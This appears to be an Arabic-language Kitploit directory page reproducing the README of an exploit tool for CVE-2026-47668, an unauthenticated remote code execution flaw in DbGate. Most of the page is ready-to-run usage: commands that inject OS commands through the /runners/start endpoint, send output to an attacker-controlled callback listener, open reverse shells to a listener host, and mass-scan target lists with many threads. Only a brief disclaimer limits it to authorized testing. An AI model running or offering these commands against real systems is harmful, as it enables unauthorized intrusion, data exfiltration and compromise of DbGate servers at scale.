Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-47668 — تنفيذ الأوامر عن بُعد غير مصادق عليه في DbGate | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2026-47668
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHubnxploited/cve-2026-47668

CVE-2026-47668

تنفيذ الأوامر عن بُعد غير مصادق عليه في DbGate

عرض المستودع
64منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-47668 — تنفيذ الأكواد عن بُعد في DbGate

تنفيذ أكواد غير مصادق عليه عن بُعد في DbGate JSON Script Runner (dbgate-serve ≤ 7.1.8).
أداة التقييم: CVE-2026-47668.py — للاختبار المصرح به فقط.

CVECVE-2026-47668
الخطورةحرجة
المنتجDbGate / dbgate-serve
المتأثر≤ 7.1.8
المُصلَح≥ 7.1.9
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-20, CWE-94, CWE-1188

الثغرة

العنوان: تنفيذ أكواد عن بُعد غير مصادق عليه في DbGate عبر JSON Script Runner

يتم تضمين الحقول التي يتحكم فيها المستخدم (functionName, variableName) في JavaScript المولدة ديناميكيًا دون التحقق السليم. يمكن للمهاجم تنفيذ أكواد عشوائية في عملية Node.js الفرعية.

العنصرالتفصيل
النقطة النهائيةPOST /runners/start
المصادقةمطلوبة Bearer؛ قد يتم الحصول على الرمز عبر POST /auth/login في النشرات المجهولة/الافتراضية
الحقنfunctionName, variableName في أوامر assign بتنسيق JSON
التأثيرتنفيذ أوامر نظام التشغيل كمستخدم عملية DbGate

التخفيف: الترقية إلى 7.1.9+. تقييد الوصول إلى الشبكة، تعطيل المصادقة المجهولة، تدوير بيانات الاعتماد، مراجعة السجلات بحثًا عن نشاط مشبوه في /runners/start.


الاتصال

تيليجرام: @KNxploited


نظرة عامة على الأداة

CVE-2026-47668.py تتحقق وتتحقق من صحة الاستغلال ضد مثيلات DbGate التي لديك التصريح لاختبارها.

الأنماط

النمطشل عكسيالوصف
AUTOلاطلب واحد؛ رمز + استدعاء HTTP + إعدادات افتراضية
CLIاختياريتحكم كامل عبر الخيارات
Massلامسح من targets.txt
--reverse-shellنعمتحقق TCP اختياري (هدف واحد فقط)

النتائج

النتيجةالمعنى
FAILغير قابل للوصول، فشلت المصادقة، أو غير معرض
VULNقبل المُشغِّل اختبار البروب فقط
DISPATCHتم إرسال الحمولة؛ لا تأكيد إخراج
EXFILتم استلام الاستدعاء — تأكيد إخراج الأوامر
REVSHتم الاتصال العكسي TCP (النمط الاختياري فقط)

دليل الإخراج: Nx/ (vuln, dispatch, exfil, failed, list_report, ملفات لكل هدف تحت exfil/)


التثبيت

root@kitploit:~
pip install -r requirements.txt

يتطلب: Python 3.9+, aiohttp, colorama


الاستخدام

معالج AUTO (افتراضي — بدون شل عكسي)

root@kitploit:~
python CVE-2026-47668.py
المدخل عند الطلبمثال
عنوان URL واحدhttp://192.168.1.10:3000
عنوان URL + أمرhttp://192.168.1.10:3000|id
قائمة أهدافtargets.txt

CLI — تفعيل الخيار

يجب أن يتضمن كل تشغيل CLI --cli.

root@kitploit:~
python CVE-2026-47668.py --cli [options]

هدف واحد

-u / --url — عنوان URL الأساسي للهدف

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000

--cmd / --command — أمر الشل (افتراضي: id)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "id"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "uname -a"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "ls -la /tmp"

--check-only — اختبار الثغرة فقط (بدون أمر)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --check-only

--vector — متجه الحقن: functionName | variableName | both

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --vector both --cmd id

--port — المنفذ الافتراضي عندما لا يحتوي عنوان URL على منفذ (افتراضي: 3000)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10 --port 3000 --cmd id

--token — استخدام رمز Bearer موجود

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --token "eyJhbGciOi..." --cmd id

--login-json — نص تسجيل دخول مخصص (افتراضي: {"amoid":"none"})

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --login-json "{\"amoid\":\"none\"}" --cmd id

--timeout — مهلة HTTP بالثواني

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --timeout 20 --cmd id

--secure — التحقق من شهادات TLS

root@kitploit:~
python CVE-2026-47668.py --cli -u https://dbgate.example.com:3000 --secure --cmd id

الاستدعاء / تصدير البيانات (افتراضي في CLI مع --cmd)

--callback-host — عنوان IP/اسم المضيف الذي يستخدمه الهدف للوصول إلى المستمع الخاص بك

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --callback-host 192.168.1.5 --cmd id

--listen-host — الربط المحلي لمستمع HTTP (افتراضي: 0.0.0.0)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-host 0.0.0.0 --cmd id

--listen-port — منفذ تصدير HTTP (افتراضي: 8888)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-port 8888 --cmd id

-c / --callback — عنوان URL استدعاء خارجي (يعطل المستمع المدمج)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 -c http://192.168.1.5:9999/ --cmd id

--wait-exfil — ثواني الانتظار للاستدعاء (هدف واحد، افتراضي: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --wait-exfil 15 --cmd id

--no-b64 — إرسال الإخراج بدون ترميز base64

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --no-b64 --cmd id

--async-exec — exec غير متزامن بدلاً من execSync

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --async-exec --cmd id

المسح الجماعي (بدون شل عكسي)

-f / --file — ملف قائمة الأهداف

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id

-t / --threads — العمال المتزامنون (افتراضي: 30)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 50

--mass-wait-exfil — انتظار الاستدعاء لكل هدف في المسح الجماعي (افتراضي: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id --mass-wait-exfil 12

المسح الجماعي + منفذ افتراضي مخصص

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --port 3000 --cmd "id"

الشل العكسي (اختياري — هدف واحد فقط)

غير مطلوب للاختبار العادي. استخدم تصدير HTTP (--cmd) للإثبات.

--reverse-shell — يتصل الهدف بـ LHOST:LPORT (حذف القيمة = IP الشبكة المحلية + المنفذ 4444)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444

--revsh-port — المنفذ عندما لا يحتوي --reverse-shell على :port

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5 --revsh-port 4444

--revsh-bind — عنوان الاستماع المحلي

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-bind 0.0.0.0

--wait-revsh — انتظار TCP (افتراضي: 15)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --wait-revsh 20

--revsh-interactive — ترحيل stdin/stdout أساسي بعد الاتصال

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-interactive

ملاحظة Docker: استخدم عنوان IP يمكن الوصول إليه من حاوية DbGate (مثل بوابة المضيف)، وليس 127.0.0.1 على جهاز الكمبيوتر الخاص بك فقط.


قائمة الأهداف (targets.txt)

root@kitploit:~
# تعليق
192.168.1.10
192.168.1.11:3000
http://10.0.0.8:3000
http://10.0.0.9|uname -a
https://dbgate.local|id
  • لا منفذ → 3000 يُطبق تلقائيًا
  • host|command → تجاوز الأمر لكل سطر
  • التقرير: Nx/list_report.txt

ملفات الإخراج

الملفالمحتوى
Nx/vuln.txtالأهداف المعرضة (البروب ناجح)
Nx/dispatch.txtتم إرسال الحمولة، غير مؤكد
Nx/exfil.txtاستدعاءات مؤكدة
Nx/failed.txtالأهداف الفاشلة
Nx/exfil/<host>.txtإخراج الأوامر لكل هدف
Nx/sessions/<id>/summary.jsonملخص الجلسة

سير العمل

  1. POST /auth/login → رمز Bearer (تلقائي ما لم يتم استخدام --token)
  2. البروب → يقبل المُشغِّل الحقن
  3. POST /runners/start → تشغيل الأمر + استدعاء HTTP (أو TCP عكسي إذا تم تفعيله)
  4. التصنيف → EXFIL = تأكيد الإخراج

إخلاء مسؤولية

لـاختبار الأمان المصرح به فقط. يجب أن يكون لديك إذن صريح لاختبار أي نظام. المؤلف غير مسؤول عن سوء الاستخدام أو الاستخدام غير القانوني.


بواسطة: Nxploited

تنزيل الأداة